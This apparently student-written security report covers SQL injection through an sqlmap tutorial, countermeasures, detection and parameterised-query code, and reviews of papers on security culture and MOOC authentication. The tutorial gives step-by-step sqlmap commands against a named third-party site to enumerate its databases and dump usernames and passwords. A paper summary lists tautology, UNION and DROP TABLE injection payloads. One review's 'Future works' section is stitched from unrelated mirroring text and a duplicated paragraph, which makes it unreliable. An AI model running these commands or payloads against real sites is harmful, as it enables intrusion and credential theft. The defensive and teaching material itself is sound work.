management systems.
• Full support for six SQL injection techniques: Boolean-based blind, time-based blind,
error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by
providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and
columns.
• Automatic recognition of password hash formats and support for cracking them using
a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per
user's choice. The user can also choose to dump only a range of characters from each
column's entry.
• Support to search for specific database names, specific tables across all databases or
specific columns across all databases' tables. This is useful, for instance, to identify
tables containing custom application credentials where relevant columns' names
contain strings like name and pass.
• Support to download and upload any file from the database server's underlying file
system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.

3.5 Step by step tutorial on how to use SQLMAP tool in Kali Linux

Step 1: First find a website that is likely to be injectable; search for pages whose URL
carries a numeric parameter (for example the keyword php?id=1), and only test a site you are
authorised to attack.

Step 2: Open Kali Linux and open a terminal to run sqlmap.

Step 3: Run sqlmap against the URL with --dbs to enumerate the databases.

Step 4: sqlmap fingerprints the DBMS and lists the available databases.

Step 5: Select one of the databases and enumerate it.

Step 6: sqlmap now scans the selected database.

Step 7: It shows the tables in the selected database.

Step 8: Type the command to enumerate the users table.

Step 9: It shows the columns that the users table contains.

Step 10: Dump the username and password columns.

Finally you will be able to retrieve the usernames and passwords of the selected website.

The commands used for each step are listed below. The target URL is the one shown in the
screenshots; replace it with a target you are authorised to test.

Step 1: list the databases

sqlmap -u "http://www.newdeal.so/content.php?id=1" --dbs

Step 2: list the tables of the database found in step 1

sqlmap -u "http://www.newdeal.so/content.php?id=1" -D newdeal_newdb --tables

Step 3: list the columns of the users table

sqlmap -u "http://www.newdeal.so/content.php?id=1" -D newdeal_newdb -T users --columns

Step 4: dump the username column

sqlmap -u "http://www.newdeal.so/content.php?id=1" -D newdeal_newdb -T users -C username --dump

Step 5: dump the password column

sqlmap -u "http://www.newdeal.so/content.php?id=1" -D newdeal_newdb -T users -C password --dump

Steps 4 and 5 can be combined by passing both columns at once: -C username,password --dump.

3.6 Countermeasure the sqlmap attack

With such tools in circulation, and web application vulnerabilities at large, what can
businesses do to better safeguard themselves? When it comes to stopping SQL injection
attacks, start with these pieces of advice:

1. Blacklist malicious hosts. The most dangerous hosts can be identified and then
blacklisted from database access.
2. Pool resources. Businesses that share information on SQL injection attacks get a better picture
of which hosts are launching them. The update rate of the blacklist must be high in order
to keep up with new threats, because on average attacking hosts only remain active for about half a day.
3. Minimize access. Restrict the data that any given web application can retrieve from a
database. Never allow admin-level access to a database from a web application.
4. Encrypt data. Never store sensitive data in plain text. Encrypt it, so that if
attackers do manage to dump your database, they extract fewer pieces of high-value
information. Passwords in particular should be stored as salted hashes from a slow
password-hashing function rather than encrypted, so that a dumped table does not yield them.
5. Distrust users. That is an essential web application security mantra. What it
means is that web application developers should only allow the inputs
that they expect to receive, and block all others. The single most effective control is never to build
SQL by concatenating user input: use parameterised queries (prepared statements), so that input
is passed as data and cannot change the structure of the statement.
6. Profile applications. Understand normal web application behaviour, so you can quickly
identify when the application is behaving abnormally, such as attempting many
more database lookups than normal, or using unusual inputs.
7. Normalize inputs. Normalize database inputs (URL-decode, strip comments, fold case) to defeat
evasion attempts, then compare them against a database of known-bad inputs to spot in-progress attacks.
8. Watch for automation. Since most SQL injection attacks are launched using automated
tools, watch for indications of this technique. Various mechanisms exist to detect
automated clients, such as rate-based policies and enforcement of a valid client response to
challenges.

The above techniques will help IT teams block SQL injection attacks. They will not stop every
last web application attack, but given the prevalence of vulnerabilities in those applications,
as well as attackers' ability to exploit the flaws, businesses can use all the help
that they can get.
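Points 1, 7 and 8 above describe a detection pipeline without showing one. The following is an added example, not code from the page or from any vendor product, that runs that pipeline over a handful of constructed access-log lines: it normalises each query string (single and double URL-decoding, inline comments used as whitespace, case), matches it against a small set of known-bad patterns, counts requests per host per second as a rate-based automation check, and produces the blacklist candidates. The log format, the IP addresses (documentation ranges), the signatures and the per-second threshold are all assumptions for the demo; a real deployment would tune the signature set and the rate limit to its own traffic.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines in a common-log-like shape: host, time, request.
# Host 203.0.113.7 runs an automated boolean/union/time-based probe sequence,
# 198.51.100.33 sends two evasive payloads by hand, 198.51.100.20 is a normal reader.
LOG_LINES = [
    '203.0.113.7 [16/Jun/2017:10:00:01] "GET /content.php?id=1 HTTP/1.1" 200',
    '203.0.113.7 [16/Jun/2017:10:00:02] "GET /content.php?id=1%20AND%201%3D1 HTTP/1.1" 200',
    '203.0.113.7 [16/Jun/2017:10:00:02] "GET /content.php?id=1%20AND%201%3D2 HTTP/1.1" 200',
    '203.0.113.7 [16/Jun/2017:10:00:03] "GET /content.php?id=1%20UNION%20SELECT%20NULL,NULL-- HTTP/1.1" 200',
    '203.0.113.7 [16/Jun/2017:10:00:03] "GET /content.php?id=1%20AND%20(SELECT%201)-- HTTP/1.1" 200',
    '203.0.113.7 [16/Jun/2017:10:00:03] "GET /content.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200',
    '198.51.100.20 [16/Jun/2017:10:00:05] "GET /content.php?id=2 HTTP/1.1" 200',
    '198.51.100.20 [16/Jun/2017:10:00:09] "GET /content.php?id=3 HTTP/1.1" 200',
    '198.51.100.33 [16/Jun/2017:10:00:12] "GET /content.php?id=1/**/uNiOn/**/sElEcT/**/1,2 HTTP/1.1" 200',
    '198.51.100.33 [16/Jun/2017:10:00:40] "GET /content.php?id=1%2520AND%25201%253D1 HTTP/1.1" 200',
]

LINE_RE = re.compile(r'^(\S+) \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})$')

# Known-bad patterns, applied to the normalised query string only.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b.*\bselect\b"),
    "boolean-test": re.compile(r"\b(?:and|or)\b\s*\(?\s*\d+\s*=\s*\d+"),
    "time-delay": re.compile(r"\b(?:sleep|benchmark|pg_sleep)\s*\(|\bwaitfor\s+delay\b"),
    "subselect": re.compile(r"\(\s*select\b"),
    "comment-terminator": re.compile(r"(?:--|#)\s*$"),
}


def parse_line(line):
    m = LINE_RE.match(line)
    if not m:
        return None
    host, ts, path, status = m.groups()
    return {"host": host, "ts": ts, "query": path.partition("?")[2], "status": status}


def normalize(raw):
    """Undo the usual evasions before matching: single and double URL-encoding,
    /**/ comments used instead of spaces, mixed case and odd whitespace."""
    s = raw
    for _ in range(2):
        s = unquote_plus(s)
    s = re.sub(r"/\*.*?\*/", " ", s)
    s = re.sub(r"\s+", " ", s).strip()
    return s.lower()


def match_signatures(normalized):
    return [name for name, rx in SIGNATURES.items() if rx.search(normalized)]


def analyse(lines, per_second_limit=3):
    """Per host: which known-bad patterns appeared, whether the request rate
    looks automated, and the resulting blacklist candidates."""
    hits = defaultdict(set)
    per_second = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name in match_signatures(normalize(rec["query"])):
            hits[rec["host"]].add(name)
        per_second[(rec["host"], rec["ts"])] += 1
    automated = {host for (host, _), n in per_second.items() if n >= per_second_limit}
    return {
        "signature_hits": {host: sorted(names) for host, names in hits.items()},
        "automated": sorted(automated),
        "blacklist": sorted(set(hits) | automated),
    }


if __name__ == "__main__":
    for key, value in analyse(LOG_LINES).items():
        print(key, value)
```

Normalising before matching is what makes the /**/ and double-encoded payloads from 198.51.100.33 visible; without it both would pass a naive pattern check, which is the evasion point 7 warns about.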

3.7 Conclusion

It is clear from the above description that SQL injection attacks are one of the largest classes of
security issues. Most existing techniques either require developers to manually specify the
interfaces to an application or, if automated, are often inadequate when
applied to modern, complex web applications.

Task 4 – Individual Part

Sivanandha – TP038986
Journal Information

Title: STUDY ON SQL INJECTION ATTACKS: MODE, DETECTION AND PREVENTION
Author: Subhranil Som, Sapna Sinha, Ritu Kataria

Journal Name: International Journal of Engineering Applied Sciences and Technology

Date: June - July 2016

Location: AIIT, Amity University Uttar Pradesh, Noida, India

Objective
Web applications are nowadays used for online services, for instance social
networking, shopping, managing accounts and so forth. Web applications handle
complex client data. Unauthorised access can lead to the collapse of a system; it can even threaten
the existence of an organisation, a bank or a branch. SQL Injection Attacks (SQLIA) are
among the most dangerous security risks to web applications. Researchers are
trying to control SQLIA at the application layer, whereas earlier work tried to
prevent SQLIA at the database level through stored procedures. This paper shows
approaches to avoid SQLIA in stored procedures. The application is secured from
attacks with the technique in two stages: if the first stage cannot secure it, the
second stage can prevent the attack.

A critical review proposes that by using SQLIA an attacker can thereby gain
or alter private/sensitive data. Very little emphasis is laid on securing stored
procedures in the database layer, which could suffer the bad effects of SQLIA. As
stored procedures live on the database side, the techniques proposed by others cannot be applied
to secure stored procedures themselves. They proposed a novel technique to defend against
the attacks targeted at stored procedures. This framework combines static application code
analysis with runtime validation to eliminate the occurrence of such attacks. In the static part,
they design a stored procedure parser, and for any SQL statement which depends on client
inputs, they use this parser to instrument the necessary statements in order
to compare the original SQL statement structure with that including client
inputs. The process of this technique can be automated and applied on an as-needed
basis. This paper gives a classification of techniques to prevent and detect SQLIA. They
describe web application vulnerabilities and how they may lead to SQLIA. Then, they
demonstrate a classification of SQLIA based on the underlying weakness, and afterwards the SQL
injection detection techniques and three distinct classes of prevention techniques. These
techniques cope with the possibility of SQLIA. Different SQL injection detection and
prevention techniques which have recently been proposed are discussed in this paper.
Also, the frameworks were evaluated with respect to deployment requirements.

Finding outcomes
Advanced SQL Injection in SQL Server Applications: this report discusses in detail the
basic 'SQL injection' technique as it applies to the popular Microsoft Internet Information
Server / Active Server Pages / SQL Server platform. It examines the different ways in which SQL
can be 'injected' into the application and addresses some of the data validation and
database lockdown issues related to these attacks. SQL Injection Attacks in Web
Application: this paper presents the different techniques of SQLIA. Using these
techniques, software architects and system administrators can understand SQLIA more thoroughly
and secure the web application from them. However, as the technology keeps
developing, so will the security threats and methods used by malicious users. As the
users of the web move their sensitive data into the online environment, it is essential that
security be given the highest priority in the development of web applications. SQL Injection Attacks:
Techniques and Protection Mechanisms: code injection attacks, especially SQLIA, are one of
the serious issues. Controlling the malicious SQL code/script on the web application and
maintaining end-to-end security is still a key challenge for web developers. Website designers
involved in creating sites should consider these issues when using databases. This paper
describes how an attacker can abuse the web application by using SQL injection
to obtain private information from a database. Different protection mechanisms against
SQLIA are also proposed.

TYPES OF SQL Injection Attack

1. Tautologies: inject SQL tokens into the conditional query statement so that it
always evaluates to true.

• Sample code: SELECT * FROM Customer WHERE name = 'ritu' OR '1' = '1'

2. Logically Incorrect Queries: the error messages returned for deliberately malformed queries
help attackers to find injectable parameters in the application and learn about the application's database.

3. Union Query: with this technique the attacker supplies crafted data for some
fields, so the SQL query is sent as the UNION of the legitimate query and an attacker-controlled
one. As a result, the data set from the database is returned together with the legitimate fields.

• Sample code: an attacker could inject the text ' UNION SELECT card_No FROM
Credit_Cards WHERE acct_No=12450 -- into the login field, which produces the
following query: SELECT acc_inf FROM clients WHERE login='' UNION SELECT
card_No FROM Credit_Cards WHERE acct_No=12450 -- AND pass='' AND pin=

4. Piggy-backed Queries: in this kind of attack the attacker adds extra queries to the
existing query. The attacker does not change the original query but appends a new one
to it, so the database receives multiple SQL queries.
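The four classes above, and the countermeasure advice in Task 3, are easiest to see side by side in running code. The example below is an added illustration, not code from the reviewed paper or from the page: it reuses the paper's clients / Credit_Cards names and its union payload on a constructed in-memory SQLite database, sends one payload per attack class through a login function that concatenates input and through the same function written with placeholders, and reports what each returns. The sample rows, the password column values and the third "stacked" variant (which uses an interface that executes several statements per call, standing in for drivers of DBMSs that allow stacked queries) are assumptions for the demo.

```python
import sqlite3

# Constructed schema matching the paper's union example: a clients table holding
# account information and a Credit_Cards table the application never meant to expose.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE clients(login TEXT, pass TEXT, acc_inf TEXT);
        INSERT INTO clients VALUES ('ritu', 'pw-ritu', 'account 1001');
        CREATE TABLE Credit_Cards(acct_No INTEGER, card_No TEXT);
        INSERT INTO Credit_Cards VALUES (12450, '4111-1111-1111-1111');
    """)
    return con


def login_vulnerable(con, login, pw):
    """String concatenation: whatever the user typed becomes part of the SQL."""
    sql = f"SELECT acc_inf FROM clients WHERE login='{login}' AND pass='{pw}'"
    return [row[0] for row in con.execute(sql)]


def login_vulnerable_stacked(con, login, pw):
    """Same concatenation, but run through an interface that executes several
    statements per call, as drivers for DBMSs with stacked-query support do."""
    sql = f"SELECT acc_inf FROM clients WHERE login='{login}' AND pass='{pw}'"
    con.executescript(sql)
    return []


def login_safe(con, login, pw):
    """Parameterised query: values travel separately from the statement text,
    so they can never alter its structure, whatever characters they contain."""
    sql = "SELECT acc_inf FROM clients WHERE login=? AND pass=?"
    return [row[0] for row in con.execute(sql, (login, pw))]


# One (login, password) payload per attack class from the classification above.
PAYLOADS = {
    "tautology": ("' OR '1'='1", "' OR '1'='1"),
    "logically-incorrect": ("'", "x"),
    "union": ("' UNION SELECT card_No FROM Credit_Cards WHERE acct_No=12450 --", ""),
    "piggy-backed": ("", "'; DROP TABLE Credit_Cards; SELECT '"),
}


def attempt(login_fn, con, login, pw):
    """Run one login attempt and report either the rows or the DB error text,
    which is exactly what a logically incorrect query is fishing for."""
    try:
        return ("rows", login_fn(con, login, pw))
    except (sqlite3.Error, sqlite3.Warning) as exc:
        return ("error", str(exc))


def table_exists(con, name):
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row is not None


def run_all():
    results = {}
    for name, (login, pw) in PAYLOADS.items():
        results[name] = {
            "vulnerable": attempt(login_vulnerable, make_db(), login, pw),
            "safe": attempt(login_safe, make_db(), login, pw),
        }
    # sqlite3's execute() refuses a second statement, so the piggy-backed payload
    # is also sent through the multi-statement interface to show its real effect.
    login, pw = PAYLOADS["piggy-backed"]
    con = make_db()
    attempt(login_vulnerable_stacked, con, login, pw)
    results["piggy-backed"]["table_after_stacked"] = table_exists(con, "Credit_Cards")
    con = make_db()
    attempt(login_safe, con, login, pw)
    results["piggy-backed"]["table_after_safe"] = table_exists(con, "Credit_Cards")
    return results


if __name__ == "__main__":
    for name, outcome in run_all().items():
        print(name, outcome)
```

The same four payloads that log in without a password, leak a parser error, return a card number and drop a table against the concatenated query all simply match no row against the parameterised one; whether stacked queries work at all depends on the DBMS and driver, which is why sqlmap lists them as a separate technique.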

Static Approach:

Programmers set a few rules for SQLIA detection during web
application development, and this technique is also called the pre-generated approach. For the
pre-generated method of detecting SQLIA an effective validity checking component is
required for the input data variables.

Dynamic Approach:

Post-generated techniques are useful for analysing the dynamic SQL query at runtime,
generated from client data by a web application, and thus this methodology is also called the
post-generated approach. Detection techniques in this post-generated class execute
before submitting a query to the database server. In this paper, they have handled
security at both ends, i.e. frontend and backend, without compromise, by proposing
two frameworks for avoiding SQLIA.

Impact of research on SQL injection

SQL Injection Attacks (SQLIA) can be found in many web applications that lack
input variable filtering. The problem addressed by this review is the weak input filtering and
validation of forms in dynamic web applications, together with the use of a single detection
and prevention method against SQL injection attacks. The aim of this review is to
explore the impact of poor input validation of SQL queries, to isolate the parameters used
for injecting malicious SQL, on the security of the server database, and to improve the filtering
that separates legitimate client input from malicious input in dynamic e-commerce web
applications. It proposes a strategy called Combined Detect, based on
two methods implemented in JavaScript and PHP code, to identify a malicious SQL query
and isolate it before sending it to the server (client-side JavaScript checks can be bypassed by an
attacker who submits requests directly, so the server-side PHP check is the one that must be
authoritative). The result of this review shows that
many web developers ignore the high risks of SQL injection attacks on the security and
secrecy of data stored in databases. Malicious SQL parameters that reach
the database on the server could damage the entire database or steal data. The method
used in this review, based on JavaScript and PHP code, enables the dynamic web
application to separate normal data from malicious data regardless
of what input is entered through the input fields. The review recommends avoiding any
weakness in the SQL server by providing strong input validation to separate the malicious
parameters used for SQL injection attack queries, and using different detection
techniques for SQL injection.

Methodology and Techniques


The working of the proposed strategy is described in two parts:

New Client Registration

A new client enters the login details, a user name and password,
on the client side to get registered. According to the proposed scheme, the user name and
password are processed at the middle tier. The stages are as follows:

1. Compute the hash of the login name, keyed with the password.

2. Compute the hash of the password, keyed with the login name.

3. Concatenate the results of step 1 and step 2 to obtain the final hash code.

4. The login name, password and final hash code are to be stored in the client table.

Login and verification

The login form must be filled in by the client to sign in to the database. The
stages are as follows:

1. A user name and password are entered at the client side.

2. The name stored in the client table is matched with the entered user name.

3. According to the proposed framework, the user name and password are processed at run
time to compute the final hash code, after the user name has been matched.

4. The final hash code and password are checked against the values stored in the database.

5. If the client is genuine they can access data from the database; otherwise an error
message is shown.

Note that the hash check only authenticates the user: the lookup in step 2 must itself be a
parameterised query, otherwise the entered user name can still inject SQL before any hash is compared.

Future works and Recommendation

The research holds that a comprehensive computer security policy has a direct effect on computer
security culture, which can be further explained through indirect effects. It is anticipated that
the statistical findings of this research will support the conceptual research model, and
that the findings will benefit scholars and practitioners alike. High-safety
mode with automatic failover is intended for a high-availability network that has
either a dedicated connection or a fairly simple network design that limits the
sources of possible network failures. Such an excellent network environment is
essential for high-safety mode with automatic failover and is recommended for all
database mirroring sessions. However, high-performance mode and high-safety mode without
automatic failover are much less affected by network reliability. In test environments, it
is appropriate to explore all the operating modes to evaluate how database mirroring performs. In
any case, before you deploy mirroring into a production environment, ensure that you understand how the
system functions in the real world.

Lin Siong Jie TP032265
Journal Information

Title : Effects of a Comprehensive Computer Security Policy on Computer Security Culture

Author : Dennis C. Acuña

Journal Name : Midwest Association for Information Systems (MWAIS)[ CITATION DAr12 \l 17417 ][ CITATION DAr07 \l 17417 ]

Date : 19 May 2016

Research Paper Objectives

The main objective of this paper is to examine the effects of a comprehensive computer
security policy on computer security culture. The researcher
explores the direct effect that a comprehensive computer security policy has on computer
security culture and on a computer security program, as well as the indirect effects derived
from it.

Finding Outcome

Key to the premise of this study is the scope and ownership of the computer security policy.
This study contends that a computer security policy must be comprehensive in scope in order
to have a meaningful impact on enterprise computer security culture, as a comprehensive
computer security policy represents a policy that spans all aspects of enterprise computer
security. This study defines a comprehensive computer security policy as a top-level policy
incorporating enterprise ownership of both IT computer security and OT computer security.
A practical reference to this viewpoint is that described by the Reference Model for
Computer Integrated Manufacturing (CIM), wherein the separation between the IT domain
and the OT domain can be paraphrased as the point of demarcation between computer
decision support systems leveraged by humans (IT), and computer industrial control systems
that make control decisions autonomously (OT).

The premise of this study holds that a comprehensive scope is necessary for a computer
security policy to have a meaningful impact on computer security culture, and that it is the
comprehensive nature of the computer security policy that separates this study from other
studies in this domain. A comprehensive computer security policy sets the tone for clear
ownership of enterprise computer security by recognizing the difference between IT and OT,
which in turn sets the tone for developing and maintaining a culture of computer security
across an enterprise. Every human in the enterprise is responsible for computer security
regardless of whether their assigned role aligns more closely with IT computer security than
OT computer security, and vice versa, and this distinction must be recognized by a top-level
policy for persistence of a meaningful computer security culture.

The premise of this study is both novel and timely in its intent to better understand the factors
that influence a culture of computer security, given that computer security culture is posited
as an effective control for managing the human aspect of computer security. The premise is
novel in that no peer reviewed research was found that explained the direct effect of a
comprehensive computer security policy on computer security culture through an
understanding of its indirect effects. The premise is timely in that computer threats and
computer vulnerabilities, sometimes referred to as cybersecurity, are evolving rapidly and are
capable of introducing significant computer risk to an organization. Therefore, research that
contributes to a better understanding of the factors that impact computer security culture
represents research that is important to any organization that relies on humans for computer
security.

Methodology and Techniques

The researcher uses a survey instrument with a Likert scale for measurement. Where possible,
questions for the survey instrument will be drawn from similar studies conducted in this
research domain. A commercial Internet service will be used for survey instrument
distribution and data collection. A pilot survey will be conducted prior to the primary data
survey to ensure robustness. Target respondents are information technology practitioners
located within the United States, randomly selected from the information technology
workforce.

Multivariate data analysis techniques performed on the collected data will include
confirmatory factor analysis (CFA) to test how well the measured variables represent model
constructs. Structural equation modelling (SEM) will be used to estimate the overall fit of the
model. Particular attention will be given to the indirect effect of factors, both mediating and
moderating, impacting computer security culture.

Extant research incorporating Technology Threat Avoidance Theory (TTAT), deterrence
theory, and the constructs of perceived effectiveness, perceived avoidability, and self-
efficacy was referenced to help develop the conceptual research model shown in the
figure below.

Figure 1: Conceptual Research Model

Future Works and Recommendation

The research holds that a comprehensive computer security policy has a direct effect on computer
security culture, which can be further explained through indirect effects. It is anticipated that
the statistical findings of this research will support the conceptual research model. It is further
anticipated that the findings of this study will benefit scholars and practitioners alike.

Jin Hao TP035111
Providing Information Security to MOOC: Towards effective student authentication

• Research Paper Objectives:

Massive Open Online Courses (MOOCs) are defined as open, free, participatory and
distributed courses that represent a new generation of online education, with easy and extensive
access on the Internet, and they involve a very large number of students. However, because of the
rush of the academic community to join the MOOC hype, other MOOC challenges
have to be faced, such as high dropout rates, low quality, plagiarism, security vulnerabilities and
anomalous certification. In fact, although a MOOC is easy and widely accessible, and
therefore generally involves a very large number of participants, anomalous user authentication
cannot ensure that the actual identity of MOOC students is known, in order to verify
that MOOC students are who they say they are and are not cheating the system.

MOOCs' current deliverers are extremely concerned about this user authentication issue and
make terrific efforts to know and verify the student identity throughout the MOOC sessions.
For example, they use biometrics (e.g. typing patterns) and other complicated mechanisms,
which sometimes prove unreliable and are frequently privacy intrusive. This also turns into
an issue for employing enterprises relying on the emergent MOOC educational phenomenon
and satisfying accrediting institutions. Innovative user authentication methods for verifying
MOOC students’ identity are required, so that the course progress and results are not
compromised by either incompetence or malice. This paper is a step towards this direction.

Despite the fast development and vertiginous growth of Massive Open Online Courses
(MOOC) over the last two years, there still exist relevant drawbacks impeding MOOCs from
proving their actual potential for education. Among these drawbacks, this paper
investigated the lack of information security provision to MOOCs, with regard to
anomalous user authentication, which cannot verify the identity of the actual student so as to meet
grading requirements and satisfy accrediting institutions. To overcome the issue, this
paper proposed a global user authentication model called MOOC-SIA.

• Finding and outcome:

Although collaborative and networking activities are part of a MOOC, they need not
reside on the same platform. On the other hand, one of the problems in the MOOC arena is
security vulnerabilities.

Security vulnerabilities are broadly defined as opportunities which could allow attackers to
violate security. Security vulnerabilities are commonly found in learning management
systems (LMS). Over the last years, a large number of full-featured web-based LMS
have appeared in the marketplace with security vulnerabilities in e-mail, web and other
protocols, and other security issues in the LMS software infrastructure requirements. The
Trustwave 2012 Global Security Report shows how web application servers and database
management systems, which usually support LMS infrastructure, are deployed with security
flaws. Regarding the network protocols required by an LMS, the same report shows that although
encrypted protocols have existed for more than a decade, their insecure predecessors continue
to predominate.

The authors considered the vulnerabilities of one specific LMS as examples of real software vulnerabilities. Moodle is an
open source LMS which has become very popular among educators around the world as a
tool for creating dynamic online web sites for their students. Although Moodle is not
representative of all available LMS, its importance is shown by its adoption statistics, and
the authors therefore used it to illustrate LMS vulnerabilities in their study.

In their previous research the authors argued that traditional security approaches, when applied to the design of most
advanced eLearning systems, do not provide the security requirements necessary to
guarantee that all supported learning processes are carried out correctly and in a reliable way.
Besides, the value of e-learning components has to be adequately protected from
modification and unauthorised use, without preventing students from using them in a
flexible way. To this end, an innovative approach of Secure Learning Management Systems
(SLMS) was proposed based on security properties, attacks and Public Key Infrastructure
(PKI) solutions.

Security has been claimed by some authors to be an essential feature in the MOOC arena, especially for
grading and eventual certification purposes, provided that the security approaches target
MOOCs specifically, and in particular effective student authentication (i.e. ensuring that students are who
they say they are) and evaluation. For example, course certification can make the difference
for business models that are based on value-added MOOC services, which need the identity of the
student to be known and verified. Some popular MOOC platforms, such as Coursera, have
recently developed complex mechanisms based on keystroke biometrics (e.g.,
typing patterns) to verify the identity of participants during MOOC sessions. Biometric
methods, however, are still not reliable and are privacy intrusive.

Innovative user authentication methods for verifying the identity of MOOC students are
required, so that results and course progress are not compromised by either malice or
incompetence. For the purpose of effective user authentication in MOOCs, the authors
proposed an innovative use of educational data mining.

Educational Data Mining (EDM) is among the most active fields of education research. Data
mining techniques are widely applied to extract knowledge from large data sets and they
have been extensively used in the online learning domain. In the paper, the authors proposed
to use the most up-to-date mining techniques to extract and build useful knowledge from the
data generated by user-user and user-system interactions in the MOOC. This knowledge will
then be the basis for developing innovative user authentication strategies that help to know
and verify the actual participants during MOOC sessions.

• Impact of research:

An innovation in their model is the use of EDM [6] techniques for continuous user
authentication mechanisms [20]. Due to the high degree of student interaction during MOOC
sessions, the authors took great advantage of tracking-based user modeling techniques,
which are otherwise used to provide broader and better support for the users of on-line
educational systems [23]. Their purpose is to constantly track a student's short-term
interaction with the MOOC platform and then compare it to the student's historical, long-term
profile (user model) using EDM techniques, in order to look for potential deviations
(authentication anomalies). The data required for tracking can be collected to a large extent
from information that is kept in the log files of the MOOC platform (timestamps, user
navigation, IP addresses and other log data). This information is then analyzed and adequately
interpreted in order to extract the knowledge needed to build the user model that serves their
purpose of user authentication.
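The tracking-based comparison described above, as an added Python illustration that is not part of the reviewed paper or of this report: a long-term profile per student is built in a single pass over historical log lines, and a short-term window of recent events is scored for deviation from that profile. The log line format, the profile features (client /24 network, hour of day, course section), the weights and the threshold are assumptions chosen for this example, not values from the paper.

```python
"""Tracking-based continuous authentication over MOOC platform logs.

Added illustration, not the paper's implementation. A student's long-term
profile is built from historical log lines; a short-term window of recent
events is compared against it and a deviation score in [0, 1] is produced.
Log format, profile features, weights and threshold are assumptions.
"""
from collections import Counter
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, Iterable, List, Tuple

# Constructed sample history: "<ISO timestamp> <user> <client IP> <path>".
HISTORY = """\
2017-03-01T09:05:12 alice 10.0.5.21 /course/sec101/unit1
2017-03-01T09:17:40 alice 10.0.5.21 /course/sec101/unit1/quiz
2017-03-02T10:02:03 alice 10.0.5.33 /course/sec101/unit2
2017-03-02T10:44:19 alice 10.0.5.33 /course/sec101/forum
2017-03-03T20:15:00 alice 10.0.6.8 /course/sec101/unit2
2017-03-03T20:51:27 alice 10.0.6.8 /course/sec101/unit2/quiz
2017-03-04T09:30:11 alice 10.0.5.21 /course/sec101/unit3
2017-03-04T10:05:45 alice 10.0.5.21 /course/sec101/forum
2017-03-05T20:10:09 alice 10.0.6.8 /course/sec101/unit3
2017-03-05T09:59:59 alice 10.0.5.21 /course/sec101/unit3/quiz
"""


@dataclass
class Event:
    ts: datetime
    user: str
    ip: str
    path: str

    @property
    def net(self) -> str:
        # /24 prefix: students roam within a campus or home network, so the
        # exact host address is a weaker signal than the network it sits in
        return ".".join(self.ip.split(".")[:3])

    @property
    def section(self) -> str:
        # first two path components, e.g. "course/sec101"
        return "/".join(self.path.strip("/").split("/")[:2])


@dataclass
class Profile:
    total: int = 0
    nets: Counter = field(default_factory=Counter)
    hours: Counter = field(default_factory=Counter)
    sections: Counter = field(default_factory=Counter)


def parse_lines(text: str) -> Iterable[Event]:
    """Yield events one at a time so a large log never has to fit in memory."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, user, ip, path = line.split()
        yield Event(datetime.fromisoformat(ts), user, ip, path)


def build_profiles(events: Iterable[Event]) -> Dict[str, Profile]:
    """One pass over the log stream; memory grows with users, not with lines."""
    profiles = {}
    for e in events:
        p = profiles.setdefault(e.user, Profile())
        p.total += 1
        p.nets[e.net] += 1
        p.hours[e.ts.hour] += 1
        p.sections[e.section] += 1
    return profiles


RARE_HOUR_RATE = 0.05  # assumption: an hour with <5% of past activity is unusual
THRESHOLD = 0.5        # assumption: above this, require a stronger authentication step


def deviation_score(p: Profile, window: List[Event]) -> float:
    """Weighted share of window events that deviate from the long-term profile."""
    n = len(window)
    if n == 0 or p.total == 0:
        return 1.0  # nothing to compare against: treat the session as unverified
    unseen_net = sum(e.net not in p.nets for e in window) / n
    rare_hour = sum(p.hours[e.ts.hour] / p.total < RARE_HOUR_RATE for e in window) / n
    new_section = sum(e.section not in p.sections for e in window) / n
    # weights are assumptions; network origin is the strongest single signal here
    return round(0.5 * unseen_net + 0.3 * rare_hour + 0.2 * new_section, 3)


def check_session(profiles: Dict[str, Profile], user: str, recent: str) -> Tuple[float, bool]:
    """Score a user's recent log lines and say whether they cross the threshold."""
    window = [e for e in parse_lines(recent) if e.user == user]
    score = deviation_score(profiles.get(user, Profile()), window)
    return score, score > THRESHOLD


# Constructed short-term windows to score against alice's profile.
NORMAL = """\
2017-03-06T10:12:00 alice 10.0.5.21 /course/sec101/unit4
2017-03-06T10:30:30 alice 10.0.5.21 /course/sec101/unit4/quiz
"""
SUSPECT = """\
2017-03-06T03:01:00 alice 203.0.113.7 /course/sec101/final_test
2017-03-06T03:02:10 alice 203.0.113.7 /course/sec101/final_test
2017-03-06T03:03:25 alice 203.0.113.7 /course/sec101/final_test
2017-03-06T03:04:00 alice 203.0.113.7 /admin/grades
"""

if __name__ == "__main__":
    profiles = build_profiles(parse_lines(HISTORY))
    for name, w in (("normal", NORMAL), ("suspect", SUSPECT)):
        score, flagged = check_session(profiles, "alice", w)
        print(f"{name}: score={score} flagged={flagged}")
```

Running the block scores the matching window 0.0 and the window from an unseen network at an unusual hour 0.85. In a deployment the flagged result would trigger one of the stronger authentication steps the model provides rather than an outright rejection, since ordinary profile drift (a new campus network, a newly released course unit) also raises the score; the profile features and weights would be tuned on the platform's real log data.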

• Methodology and Techniques:

The authors presented their global user authentication model for MOOC platforms, which is
based on a multi-fold security approach in the context of general-purpose MOOCs. To this
end, they first elicited the requirements for their authentication model from a hypothetical
case study, as follows.

An e-learning platform delivers a MOOC named "applying security on IT projects", focused on
Information Technology (IT) and targeting students who are interested in IS improvements
applied to IT projects. This MOOC is offered as part of the Open University of Catalonia
(UOC) Open Programs initiative and deployed in UOC Open Courseware, with an unlimited
number of participants. It includes self- and peer-assessment activities and a final automatic
test. After successfully completing the course, the student receives credits and an official
certificate issued by UOC.

In this scenario, it is essential to verify the identity of students during the course, especially
when assessment activities are performed, thus also satisfying UOC's accreditation
requirements. To meet these requirements, the authors proposed a modular PKI-based security
model called MOOC Smart Identity Agent (MOOC-SIA) as the main component managing
